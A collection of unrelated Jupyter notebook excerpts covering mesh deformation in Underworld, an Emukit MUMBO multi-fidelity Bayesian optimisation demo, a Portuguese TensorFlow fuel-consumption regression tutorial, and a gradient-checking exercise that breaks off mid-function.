The following cell will unlock the mesh and displace a single node of the mesh in the positive x direction. ``` with mesh.deform_mesh(): mesh.data[40][0] += 0.025 figMesh.show() ``` Deforming meshes allows us to increase resolution where it is needed most. For example at the top of the simulation domain by redefining the vertical mesh coordinate to be $z := \sqrt{z}$ ``` mesh.reset() # restore the mesh to the original configuration specified by elementType with mesh.deform_mesh(): for index, coord in enumerate(mesh.data): mesh.data[index][1] = mesh.data[index][1]**0.5 figMesh.show() ``` ## Saving and loading meshes Mesh coordinate data can be saved in hdf5 format using the ``save`` method attached to the ``mesh`` class. The following line will save the mesh to a file. ``` mesh.save('deformedMesh.h5') ``` To check that this has worked we will re-create the mesh, plot and then reload the saved mesh. ``` mesh = uw.mesh.FeMesh_Cartesian( elementType = ("Q1"), elementRes = (8, 8), minCoord = (0.0, 0.0), maxCoord = (2.0, 1.0)) figMesh = glucifer.Figure(figsize=(1200,600)) figMesh.append( glucifer.objects.Mesh(mesh, nodeNumbers=True) ) figMesh.show() ``` Now load the mesh and display: ``` mesh.load('deformedMesh.h5') figMesh.show() ```
github_jupyter
# Demo of MUMBO for multi-fidelity Bayesian Optimisation

This notebook provides a demo of the MUlti-task Max-value Bayesian Optimisation (MUMBO) acquisition function of Moss et al [2020]. https://arxiv.org/abs/2006.12093

MUMBO provides the high-performing optimization of other entropy-based acquisitions. However, unlike the standard entropy search for multi-fidelity optimization, MUMBO requires only a fraction of the computational cost. MUMBO is a multi-fidelity (or multi-task) extension of the max-value entropy search also available in Emukit.

Our implementation of MUMBO is controlled by two parameters: "num_samples" and "grid_size".

"num_samples" controls how many Monte Carlo samples we use to calculate entropy reductions. As we only approximate a 1-d integral, "num_samples" does not need to be large or be increased for problems with large d (unlike standard entropy search). We recommend values between 5-15.

"grid_size" controls the coarseness of the grid used to approximate the distribution of our max value and so must increase with d. We recommend 10,000*d. Note that as the grid must only be calculated once per BO step, the choice of "grid_size" does not have a large impact on computation time. 
``` ### General imports %matplotlib inline import numpy as np import matplotlib.pyplot as plt from matplotlib import colors as mcolors import GPy import time np.random.seed(12345) ### Emukit imports from emukit.test_functions.forrester import multi_fidelity_forrester_function from emukit.core.loop.user_function import UserFunctionWrapper from emukit.multi_fidelity.convert_lists_to_array import convert_x_list_to_array from emukit.bayesian_optimization.acquisitions.entropy_search import MultiInformationSourceEntropySearch from emukit.bayesian_optimization.acquisitions.max_value_entropy_search import MUMBO from emukit.core.acquisition import Acquisition from emukit.multi_fidelity.models.linear_model import GPyLinearMultiFidelityModel from emukit.multi_fidelity.kernels.linear_multi_fidelity_kernel import LinearMultiFidelityKernel from emukit.multi_fidelity.convert_lists_to_array import convert_xy_lists_to_arrays from emukit.core import ParameterSpace, ContinuousParameter, InformationSourceParameter from emukit.model_wrappers import GPyMultiOutputWrapper from GPy.models.gp_regression import GPRegression ### --- Figure config LEGEND_SIZE = 15 ``` Set up our toy problem (1D optimisation of the forrester function with two fidelity levels) and collect 6 initial points at low fidelity and 3 at high fidelitly. 
``` # Load function # The multi-fidelity Forrester function is already wrapped as an Emukit UserFunction object in # the test_functions package forrester_fcn, _ = multi_fidelity_forrester_function() forrester_fcn_low = forrester_fcn.f[0] forrester_fcn_high = forrester_fcn.f[1] # Assign costs low_fidelity_cost = 1 high_fidelity_cost = 10 # Plot the function s x_plot = np.linspace(0, 1, 200)[:, None] y_plot_low = forrester_fcn_low(x_plot) y_plot_high = forrester_fcn_high(x_plot) plt.plot(x_plot, y_plot_low, 'b') plt.plot(x_plot, y_plot_high, 'r') plt.legend(['Low fidelity', 'High fidelity']) plt.xlim(0, 1) plt.title('High and low fidelity Forrester functions') plt.xlabel('x') plt.ylabel('y'); # Collect and plot initial samples np.random.seed(123) x_low = np.random.rand(6)[:, None] x_high = x_low[:3] y_low = forrester_fcn_low(x_low) y_high = forrester_fcn_high(x_high) plt.scatter(x_low,y_low) plt.scatter(x_high,y_high) ``` Fit our linear multi-fidelity GP model to the observed data. ``` x_array, y_array = convert_xy_lists_to_arrays([x_low, x_high], [y_low, y_high]) kern_low = GPy.kern.RBF(1) kern_low.lengthscale.constrain_bounded(0.01, 0.5) kern_err = GPy.kern.RBF(1) kern_err.lengthscale.constrain_bounded(0.01, 0.5) multi_fidelity_kernel = LinearMultiFidelityKernel([kern_low, kern_err]) gpy_model = GPyLinearMultiFidelityModel(x_array, y_array, multi_fidelity_kernel, 2) gpy_model.likelihood.Gaussian_noise.fix(0.1) gpy_model.likelihood.Gaussian_noise_1.fix(0.1) model = GPyMultiOutputWrapper(gpy_model, 2, 5, verbose_optimization=False) model.optimize() ``` Define acqusition functions for multi-fidelity problems ``` # Define cost of different fidelities as acquisition function class Cost(Acquisition): def __init__(self, costs): self.costs = costs def evaluate(self, x): fidelity_index = x[:, -1].astype(int) x_cost = np.array([self.costs[i] for i in fidelity_index]) return x_cost[:, None] @property def has_gradients(self): return True def evaluate_with_gradients(self, x): 
return self.evalute(x), np.zeros(x.shape) parameter_space = ParameterSpace([ContinuousParameter('x', 0, 1), InformationSourceParameter(2)]) cost_acquisition = Cost([low_fidelity_cost, high_fidelity_cost]) es_acquisition = MultiInformationSourceEntropySearch(model, parameter_space) / cost_acquisition mumbo_acquisition = MUMBO(model, parameter_space, num_samples=5, grid_size=500) / cost_acquisition ``` Lets plot the resulting acqusition functions (MUMBO and standard entropy search for multi-fidelity BO) for the chosen model on the collected data. Note that MES takes a fraction of the time of ES to compute (plotted on a log scale). This difference becomes even more apparent as you increase the dimensions of the sample space. ``` x_plot_low = np.concatenate([np.atleast_2d(x_plot), np.zeros((x_plot.shape[0], 1))], axis=1) x_plot_high = np.concatenate([np.atleast_2d(x_plot), np.ones((x_plot.shape[0], 1))], axis=1) t_0=time.time() es_plot_low = es_acquisition.evaluate(x_plot_low) es_plot_high = es_acquisition.evaluate(x_plot_high) t_es=time.time()-t_0 mumbo_plot_low = mumbo_acquisition.evaluate(x_plot_low) mumbo_plot_high = mumbo_acquisition.evaluate(x_plot_high) t_mumbo=time.time()-t_es-t_0 fig, (ax1, ax2) = plt.subplots(1, 2) ax1.plot(x_plot, es_plot_low , "blue") ax1.plot(x_plot, es_plot_high, "red") ax1.set_title("Multi-fidelity Entropy Search") ax1.set_xlabel(r"$x$") ax1.set_ylabel(r"$\alpha(x)$") ax1.set_xlim(0, 1) ax2.plot(x_plot, mumbo_plot_low , "blue", label="Low fidelity evaluations") ax2.plot(x_plot, mumbo_plot_high , "red",label="High fidelity evaluations") ax2.legend(loc="upper right") ax2.set_title("MUMBO") ax2.set_xlabel(r"$x$") ax2.set_ylabel(r"$\alpha(x)$") ax2.set_xlim(0, 1) plt.tight_layout() plt.figure() plt.bar(["es","MUMBO"],[t_es,t_mumbo]) plt.xlabel("Acquisition Choice") plt.yscale('log') plt.ylabel("Calculation Time (secs)") ```
github_jupyter
##### Copyright 2019 The TensorFlow Authors. ``` #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #@title MIT License # # Copyright (c) 2017 François Chollet # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. 
``` # Regressão: preveja consumo de combustível <table class="tfo-notebook-buttons" align="left"> <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/pt/r1/tutorials/keras/basic_regression"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Execute em Google Colab</a> </td> <td> <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/pt/r1/tutorials/keras//basic_regression"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />Veja a fonte em GitHub</a> </td> </table> Note: A nossa comunidade TensorFlow traduziu estes documentos. Como as traduções da comunidade são *o melhor esforço*, não há garantias de que sejam uma reflexão exata e atualizada da [documentação oficial em Inglês](https://www.tensorflow.org/?hl=en). Se tem alguma sugestão para melhorar esta tradução, por favor envie um pull request para o repositório do GitHub [tensorflow/docs](https://github.com/tensorflow/docs). Para se voluntariar para escrever ou rever as traduções da comunidade, contacte a [lista docs@tensorflow.org](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs). Em um problema de regressão, o objetivo é prever as saídas (*outputs*) de um valor contínuo, como um preço ou probabilidade. Em contraste de problemas de classificação, onde temos o propósito de escolher uma classe em uma lista de classificações (por exemplo, se uma imagem contém uma maçã ou laranja, assim reconhecendo qual fruta é representada na imagem). Este *notebook* usa a clássica base de dados [Auto MPG](https://archive.ics.uci.edu/ml/datasets/auto+mpg) e constrói um modelo para prever a economia de combustíveis de automóveis do final dos anos 1970, início dos anos 1980. Para isso, forneceremos um modelo com descrição de vários automóveis desse período. Essa descrição inclui atributos como: cilindros, deslocamento, potência do motor, e peso. Este exemplo usa a API `tf.keras`. 
Veja [este guia](https://www.tensorflow.org/r1/guide/keras) para mais detalhes. ``` # Use seaborn para pairplot !pip install seaborn from __future__ import absolute_import, division, print_function, unicode_literals import pathlib import matplotlib.pyplot as plt import pandas as pd import seaborn as sns import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers print(tf.__version__) ``` ## Base de dados Auto MPG A base de dados está disponível em [UCI Machine Learning Repository](https://archive.ics.uci.edu/ml/). ### Pegando os dados Primeiro baixe a base de dados dos automóveis. ``` dataset_path = keras.utils.get_file("auto-mpg.data", "http://archive.ics.uci.edu/ml/machine-learning-databases/auto-mpg/auto-mpg.data") dataset_path ``` Utilizando o pandas, importe os dados: ``` column_names = ['MPG','Cylinders','Displacement','Horsepower','Weight', 'Acceleration', 'Model Year', 'Origin'] raw_dataset = pd.read_csv(dataset_path, names=column_names, na_values = "?", comment='\t', sep=" ", skipinitialspace=True) dataset = raw_dataset.copy() dataset.tail() ``` ### Limpe os dados Esta base contém alguns valores não conhecidos (*unknown*). ``` dataset.isna().sum() ``` Para manter esse tutorial básico, remova as linhas com esses valores não conhecidos. ``` dataset = dataset.dropna() ``` A coluna "Origin" é uma coluna categórica e não numérica. Logo converta para *one-hot* : ``` origin = dataset.pop('Origin') dataset['USA'] = (origin == 1)*1.0 dataset['Europe'] = (origin == 2)*1.0 dataset['Japan'] = (origin == 3)*1.0 dataset.tail() ``` ### Separando dados de treinamento e teste Agora separe os dados em um conjunto de treinamento e outro teste. Iremos utilizar o conjunto de teste no final da análise do modelo. ``` train_dataset = dataset.sample(frac=0.8,random_state=0) test_dataset = dataset.drop(train_dataset.index) ``` ### Inspecione o dado Dê uma rápida olhada em como está a distribuição de algumas colunas do conjunto de treinamento.
``` sns.pairplot(train_dataset[["MPG", "Cylinders", "Displacement", "Weight"]], diag_kind="kde") ``` Repare na visão geral dos estatísticas: ``` train_stats = train_dataset.describe() train_stats.pop("MPG") train_stats = train_stats.transpose() train_stats ``` ### Separe features de labels Separe o valor alvo (*labels*), das *features*. Essa label é o valor no qual o modelo é treinado para prever. ``` train_labels = train_dataset.pop('MPG') test_labels = test_dataset.pop('MPG') ``` ### Normalize os dados Observe novamente o `train_stats` acima e note quão diferente são os intervalos de uma feature e outra. Uma boa prática é normalizar as *features* que usam diferentes escalas e intervalos. Apesar do modelo poder convergir sem a normalização, isso torna o treinamento mais difícil, e torna o resultado do modelo dependente da escolha das unidades da entrada. Observação: embora geramos intencionalmente essas estatísticas para os dados de treinamento, essas estatísticas serão usadas também para normalizar o conjunto de teste. Precisamos delinear o conjunto de teste na mesma distribuição que o modelo foi treinado. ``` def norm(x): return (x - train_stats['mean']) / train_stats['std'] normed_train_data = norm(train_dataset) normed_test_data = norm(test_dataset) ``` Esse dado normalizado é o que usaremos para treinar o modelo. Atenção: As estatísticas usadas para normalizar as entradas aqui (média e desvio padrão) precisa ser aplicada em qualquer outro dado que alimenta o modelo, junto com o código *one-hot* que fizemos anteriormente. Isso inclui o conjunto de teste e os dados que o modelo usará em produção. ## O Modelo ### Construindo o modelo Vamos construir o modelo. Aqui usaremos o modelo `Sequential` com duas camadas *densely connected*, e a camada de saída que retorna um único valor contínuo. Os passos de construção do modelo são agrupados em uma função, build_model, já que criaremos um segundo modelo mais tarde. 
``` def build_model(): model = keras.Sequential([ layers.Dense(64, activation=tf.nn.relu, input_shape=[len(train_dataset.keys())]), layers.Dense(64, activation=tf.nn.relu), layers.Dense(1) ]) optimizer = tf.keras.optimizers.RMSprop(0.001) model.compile(loss='mean_squared_error', optimizer=optimizer, metrics=['mean_absolute_error', 'mean_squared_error']) return model model = build_model() ``` ## Examine o modelo Use o método `.summary` para exibir uma descrição simples do modelo. ``` model.summary() ``` Agora teste o modelo. Pegue um batch de de 10 exemplos do conjunto de treinamento e chame `model.predict`nestes. ``` example_batch = normed_train_data[:10] example_result = model.predict(example_batch) example_result ``` Parece que está funcionando e ele produz o resultado de forma e tipo esperados. ### Treinando o modelo Treine o modelo com 1000 *epochs*, e grave a acurácia do treinamento e da validação em um objeto `history`. ``` # Mostra o progresso do treinamento imprimindo um único ponto para cada epoch completada class PrintDot(keras.callbacks.Callback): def on_epoch_end(self, epoch, logs): if epoch % 100 == 0: print('') print('.', end='') EPOCHS = 1000 history = model.fit( normed_train_data, train_labels, epochs=EPOCHS, validation_split = 0.2, verbose=0, callbacks=[PrintDot()]) ``` Visualize o progresso do modelo de treinamento usando o estados armazenados no objeto `history` ``` hist = pd.DataFrame(history.history) hist['epoch'] = history.epoch hist.tail() def plot_history(history): hist = pd.DataFrame(history.history) hist['epoch'] = history.epoch plt.figure() plt.xlabel('Epoch') plt.ylabel('Mean Abs Error [MPG]') plt.plot(hist['epoch'], hist['mean_absolute_error'], label='Train Error') plt.plot(hist['epoch'], hist['val_mean_absolute_error'], label = 'Val Error') plt.ylim([0,5]) plt.legend() plt.figure() plt.xlabel('Epoch') plt.ylabel('Mean Square Error [$MPG^2$]') plt.plot(hist['epoch'], hist['mean_squared_error'], label='Train Error') 
plt.plot(hist['epoch'], hist['val_mean_squared_error'], label = 'Val Error') plt.ylim([0,20]) plt.legend() plt.show() plot_history(history) ``` Este gráfico mostra as pequenas melhoras, ou mesmo a diminuição do `validation error` após 100 *epochs*. Vamos atualizar o `model.fit` para que pare automaticamente o treinamento quando o `validation score` não aumentar mais. Usaremos o `EarlyStopping callback` que testa a condição do treinamento a cada `epoch`. Se um grupo de `epochs` decorre sem mostrar melhoras, o treinamento irá parar automaticamente. Você pode aprender mais sobre este callback [aqui](https://www.tensorflow.org/api_docs/python/tf/keras/callbacks/EarlyStopping) ``` model = build_model() # The patience parameter is the amount of epochs to check for improvement early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=10) history = model.fit(normed_train_data, train_labels, epochs=EPOCHS, validation_split = 0.2, verbose=0, callbacks=[early_stop, PrintDot()]) plot_history(history) ``` O gráfico mostra que no conjunto de validação, a média de erro é próxima de +/- 2MPG. Isso é bom? Deixaremos essa decisão a você. Vamos ver quão bem o modelo generaliza usando o conjunto de **teste**, que não usamos para treinar o modelo. Isso diz quão bem podemos esperar que o modelo se saia quando usarmos na vida real. ``` loss, mae, mse = model.evaluate(normed_test_data, test_labels, verbose=0) print("Testing set Mean Abs Error: {:5.2f} MPG".format(mae)) ``` ### Make predictions Finalmente, prevejamos os valores MPG usando o conjunto de teste. ``` test_predictions = model.predict(normed_test_data).flatten() plt.scatter(test_labels, test_predictions) plt.xlabel('True Values [MPG]') plt.ylabel('Predictions [MPG]') plt.axis('equal') plt.axis('square') plt.xlim([0,plt.xlim()[1]]) plt.ylim([0,plt.ylim()[1]]) _ = plt.plot([-100, 100], [-100, 100]) ``` Parece que o nosso modelo prediz razoavelmente bem. Vamos dar uma olhada na distribuição dos erros.
``` error = test_predictions - test_labels plt.hist(error, bins = 25) plt.xlabel("Prediction Error [MPG]") _ = plt.ylabel("Count") ``` Não é tão gaussiana, mas isso é esperado, pois o número de exemplos é bem pequeno. ## Conclusão Este notebook introduz algumas técnicas para trabalhar com problema de regressão. * Mean Squared Error (MSE) é uma função comum de *loss* usada para problemas de regressão (diferentes funções de *loss* são usadas para problemas de classificação). * Similarmente, as métricas de avaliação usadas na regressão são diferentes da classificação. Uma métrica comum de regressão é Mean Absolute Error (MAE). * Quando o dado de entrada de *features* tem diferentes intervalos, cada *feature* deve ser escalada para o mesmo intervalo. * Se não possui muitos dados de treinamento, uma técnica é preferir uma pequena rede com poucas camadas para evitar *overfitting*. * *Early stopping* é uma boa técnica para evitar *overfitting*.
github_jupyter
# Gradient Checking Welcome to the final assignment for this week! In this assignment you will learn to implement and use __gradient checking__. You are part of a team working to make mobile payments available globally, and are asked to build a deep learning model to detect __fraud__--whenever someone makes a payment, you want to see if the payment might be fraudulent, such as if the user's account has been taken over by a hacker. But `backpropagation` is quite challenging to implement, and sometimes has bugs. Because this is a mission-critical application, your company's CEO wants to be really certain that your implementation of backpropagation is correct. Your CEO says, "Give me a proof that your backpropagation is actually working!" To give this reassurance, you are going to use "gradient checking". Let's do it! __Contents:__ 1. How does gradient checking work? 2. 1-dimensional gradient checking 3. N-dimensional gradient checking ``` # Packages import numpy as np from testCases import * from gc_utils import sigmoid, relu, dictionary_to_vector, vector_to_dictionary, gradients_to_vector ``` ## 1) How does gradient checking work? __Backpropagation__ computes the gradients $\frac{\partial J}{\partial \theta}$, where: - $\theta$ denotes the parameters of the model. - $J$ is computed using `forward propagation` and your `loss` function. Because `forward propagation` is relatively easy to implement, you're confident you got that right, and so you're almost 100% sure that you're computing the cost $J$ correctly. Thus, you can use your code for computing $J$ to verify the code for computing $\frac{\partial J}{\partial \theta}$. 
Let's look back at the definition of a __derivative (or gradient)__: $$ \frac{\partial J}{\partial \theta} = \lim_{\varepsilon \to 0} \frac{J(\theta + \varepsilon) - J(\theta - \varepsilon)}{2 \varepsilon} \tag{1}$$ If you're not familiar with the "$\displaystyle \lim_{\varepsilon \to 0}$" notation, it's just a way of saying ___"when $\varepsilon$ is really really small."___ We know the following: - $\frac{\partial J}{\partial \theta}$ is what you want to make sure you're computing correctly. - You can compute $J(\theta + \varepsilon)$ and $J(\theta - \varepsilon)$ (in the case that $\theta$ is a real number), since you're confident your implementation for $J$ is correct. Lets use equation (1) and a small value for $\varepsilon$ to convince your CEO that your code for computing $\frac{\partial J}{\partial \theta}$ is correct! ## 2) 1-dimensional gradient checking Consider a 1D linear function $J(\theta) = \theta x$. The model contains only a _single real-valued_ parameter $\theta$, and takes $x$ as input. You will implement code to compute $J(.)$ and its derivative $\frac{\partial J}{\partial \theta}$. You will then use gradient checking to make sure your derivative computation for $J$ is correct. <img src="images/1Dgrad_kiank.png" style="width:600px;height:250px;"> <caption><center> <u> **Figure 1** </u>: **1D linear model**<br> </center></caption> The diagram above shows the key computation steps: 1. First start with $x$, then evaluate the function $J(x)$ ("forward propagation"). 2. Then compute the derivative $\frac{\partial J}{\partial \theta}$ ("backward propagation"). **Exercise**: implement "`forward propagation`" and "`backward propagation`" for this simple function. I.e., compute both $J(.)$ ("forward propagation") and its derivative with respect to $\theta$ ("backward propagation"), in two separate functions. 
``` def forward_propagation(x, theta): """ Implement the linear forward propagation (compute J) presented in Figure 1 (J(theta) = theta * x) Arguments: - x -- a real-valued input - theta -- our parameter, a real number as well Return: - J -- the value of function J, computed using the formula J(theta) = theta * x """ ### START CODE HERE ### (approx. 1 line) J = theta * x ### END CODE HERE ### return J x, theta = 2, 4 J = forward_propagation(x, theta) print ("J = " + str(J)) ``` **Expected Output**: <table style=> <tr> <td> ** J ** </td> <td> 8</td> </tr> </table> **Exercise**: Now, implement the backward propagation step (derivative computation) of Figure 1. That is, compute the derivative of $J(\theta) = \theta x$ with respect to $\theta$. To save you from doing the calculus, you should get $dtheta = \frac { \partial J }{ \partial \theta} = x$. ``` # GRADED FUNCTION: backward_propagation def backward_propagation(x, theta): """ Computes the derivative of J with respect to theta (see Figure 1). Arguments: - x -- a real-valued input - theta -- our parameter, a real number as well Returns: - dtheta -- the gradient of the cost with respect to theta """ ### START CODE HERE ### (approx. 1 line) dtheta = x ### END CODE HERE ### return dtheta x, theta = 2, 4 dtheta = backward_propagation(x, theta) print ("dtheta = " + str(dtheta)) ``` **Expected Output**: <table> <tr> <td> ** dtheta ** </td> <td> 2 </td> </tr> </table> **Exercise**: To show that the `backward_propagation()` function is correctly computing the gradient $\frac{\partial J}{\partial \theta}$, let's implement gradient checking. **Instructions**: - First compute "gradapprox" using the formula above (1) and a small value of $\varepsilon$. Here are the Steps to follow: 1. $\theta^{+} = \theta + \varepsilon$ 2. $\theta^{-} = \theta - \varepsilon$ 3. $J^{+} = J(\theta^{+})$ 4. $J^{-} = J(\theta^{-})$ 5. 
$gradapprox = \frac{J^{+} - J^{-}}{2 \varepsilon}$ - Then compute the gradient using backward propagation, and store the result in a variable "grad" - Finally, compute the relative difference between "gradapprox" and the "grad" using the following formula: $$ difference = \frac {\mid\mid grad - gradapprox \mid\mid_2}{\mid\mid grad \mid\mid_2 + \mid\mid gradapprox \mid\mid_2} \tag{2}$$ You will need 3 Steps to compute this formula: - 1'. compute the numerator using `np.linalg.norm(...)` - 2'. compute the denominator. You will need to call `np.linalg.norm(...)` twice. - 3'. divide them. - If this difference is small (say less than $10^{-7}$), you can be quite confident that you have computed your gradient correctly. Otherwise, there may be a mistake in the gradient computation. ``` # GRADED FUNCTION: gradient_check def gradient_check(x, theta, epsilon = 1e-7): """ Implement the backward propagation presented in Figure 1. Arguments: x -- a real-valued input theta -- our parameter, a real number as well epsilon -- tiny shift to the input to compute approximated gradient with formula(1) Returns: difference -- difference (2) between the approximated gradient and the backward propagation gradient """ # Compute gradapprox using left side of formula (1). epsilon is small enough, you don't need to worry about the limit. ### START CODE HERE ### (approx. 5 lines) thetaplus = theta + epsilon # Step 1 thetaminus = theta - epsilon # Step 2 J_plus = forward_propagation(x, thetaplus) # Step 3 J_minus = forward_propagation(x, thetaminus) # Step 4 gradapprox = (J_plus - J_minus)/(2*epsilon) # Step 5 ### END CODE HERE ### # Check if gradapprox is close enough to the output of backward_propagation() ### START CODE HERE ### (approx. 1 line) grad = backward_propagation (x, theta) ### END CODE HERE ### ### START CODE HERE ### (approx. 
1 line) numerator = np.linalg.norm(grad - gradapprox) # Step 1' denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox) # Step 2' difference = numerator / denominator # Step 3' ### END CODE HERE ### if difference < 1e-7: print ("The gradient is correct!") else: print ("The gradient is wrong!") return difference x, theta = 2, 4 difference = gradient_check(x, theta) print("difference = " + str(difference)) ``` **Expected Output**: The gradient is correct! <table> <tr> <td> ** difference ** </td> <td> 2.9193358103083e-10 </td> </tr> </table> Congrats, the difference is smaller than the $10^{-7}$ threshold. So you can have high confidence that you've correctly computed the gradient in `backward_propagation()`. Now, in the more general case, your cost function $J$ has more than a single 1D input. When you are training a neural network, $\theta$ actually consists of multiple matrices $W^{[l]}$ and biases $b^{[l]}$! It is important to know how to do a gradient check with higher-dimensional inputs. Let's do it! ## 3) N-dimensional gradient checking The following figure describes the forward and backward propagation of your fraud detection model. <img src="images/NDgrad_kiank.png" style="width:600px;height:400px;"> <caption><center> <u> **Figure 2** </u>: **deep neural network**<br>*LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID*</center></caption> Let's look at your implementations for forward propagation and backward propagation. ``` def forward_propagation_n(X, Y, parameters): """ Implements the forward propagation (and computes the cost) presented in Figure 3. 
Arguments: X -- training set for m examples Y -- labels for m examples parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3": W1 -- weight matrix of shape (5, 4) b1 -- bias vector of shape (5, 1) W2 -- weight matrix of shape (3, 5) b2 -- bias vector of shape (3, 1) W3 -- weight matrix of shape (1, 3) b3 -- bias vector of shape (1, 1) Returns: cost -- the cost function (logistic cost for one example) """ # retrieve parameters m = X.shape[1] W1 = parameters["W1"] b1 = parameters["b1"] W2 = parameters["W2"] b2 = parameters["b2"] W3 = parameters["W3"] b3 = parameters["b3"] # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID Z1 = np.dot(W1, X) + b1 A1 = relu(Z1) Z2 = np.dot(W2, A1) + b2 A2 = relu(Z2) Z3 = np.dot(W3, A2) + b3 A3 = sigmoid(Z3) # Cost logprobs = np.multiply(-np.log(A3),Y) + np.multiply(-np.log(1 - A3), 1 - Y) cost = 1./m * np.sum(logprobs) cache = (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) return cost, cache ``` Now, run backward propagation. ``` def backward_propagation_n(X, Y, cache): """ Implement the backward propagation presented in figure 2. Arguments: X -- input datapoint, of shape (input size, 1) Y -- true "label" cache -- cache output from forward_propagation_n() Returns: gradients -- A dictionary with the gradients of the cost with respect to each parameter, activation and pre-activation variables. 
""" m = X.shape[1] (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache dZ3 = A3 - Y dW3 = 1./m * np.dot(dZ3, A2.T) db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True) dA2 = np.dot(W3.T, dZ3) dZ2 = np.multiply(dA2, np.int64(A2 > 0)) # dW2 = 1./m * np.dot(dZ2, A1.T) * 2 dW2 = 1./m * np.dot(dZ2, A1.T) db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True) dA1 = np.dot(W2.T, dZ2) dZ1 = np.multiply(dA1, np.int64(A1 > 0)) dW1 = 1./m * np.dot(dZ1, X.T) # db1 = 4./m * np.sum(dZ1, axis=1, keepdims = True) db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True) gradients = {"dZ3": dZ3, "dW3": dW3, "db3": db3, "dA2": dA2, "dZ2": dZ2, "dW2": dW2, "db2": db2, "dA1": dA1, "dZ1": dZ1, "dW1": dW1, "db1": db1} return gradients ``` You obtained some results on the fraud detection test set but you are not 100% sure of your model. Nobody's perfect! Let's implement gradient checking to verify if your gradients are correct. **How does gradient checking work?**. As in 1) and 2), you want to compare "gradapprox" to the gradient computed by backpropagation. The formula is still: $$ \frac{\partial J}{\partial \theta} = \lim_{\varepsilon \to 0} \frac{J(\theta + \varepsilon) - J(\theta - \varepsilon)}{2 \varepsilon} \tag{1}$$ However, $\theta$ is not a scalar anymore. It is a dictionary called "parameters". We implemented a function "`dictionary_to_vector()`" for you. It converts the "parameters" dictionary into a vector called "values", obtained by reshaping all parameters (W1, b1, W2, b2, W3, b3) into vectors and concatenating them. The inverse function is "`vector_to_dictionary`" which outputs back the "parameters" dictionary. <img src="images/dictionary_to_vector.png" style="width:600px;height:400px;"> <caption><center> <u> **Figure 2** </u>: **dictionary_to_vector() and vector_to_dictionary()**<br> You will need these functions in gradient_check_n()</center></caption> We have also converted the "gradients" dictionary into a vector "grad" using gradients_to_vector(). 
You don't need to worry about that. **Exercise**: Implement gradient_check_n(). **Instructions**: Here is pseudo-code that will help you implement the gradient check. For each i in num_parameters: - To compute `J_plus[i]`: 1. Set $\theta^{+}$ to `np.copy(parameters_values)` 2. Set $\theta^{+}_i$ to $\theta^{+}_i + \varepsilon$ 3. Calculate $J^{+}_i$ using to `forward_propagation_n(x, y, vector_to_dictionary(`$\theta^{+}$ `))`. - To compute `J_minus[i]`: do the same thing with $\theta^{-}$ - Compute $gradapprox[i] = \frac{J^{+}_i - J^{-}_i}{2 \varepsilon}$ Thus, you get a vector gradapprox, where gradapprox[i] is an approximation of the gradient with respect to `parameter_values[i]`. You can now compare this gradapprox vector to the gradients vector from backpropagation. Just like for the 1D case (Steps 1', 2', 3'), compute: $$ difference = \frac {\| grad - gradapprox \|_2}{\| grad \|_2 + \| gradapprox \|_2 } \tag{3}$$ ``` # GRADED FUNCTION: gradient_check_n def gradient_check_n(parameters, gradients, X, Y, epsilon = 1e-7): """ Checks if backward_propagation_n computes correctly the gradient of the cost output by forward_propagation_n Arguments: parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3": grad -- output of backward_propagation_n, contains gradients of the cost with respect to the parameters. x -- input datapoint, of shape (input size, 1) y -- true "label" epsilon -- tiny shift to the input to compute approximated gradient with formula(1) Returns: difference -- difference (2) between the approximated gradient and the backward propagation gradient """ # Set-up variables parameters_values, _ = dictionary_to_vector(parameters) grad = gradients_to_vector(gradients) num_parameters = parameters_values.shape[0] J_plus = np.zeros((num_parameters, 1)) J_minus = np.zeros((num_parameters, 1)) gradapprox = np.zeros((num_parameters, 1)) # Compute gradapprox for i in range(num_parameters): # Compute J_plus[i]. 
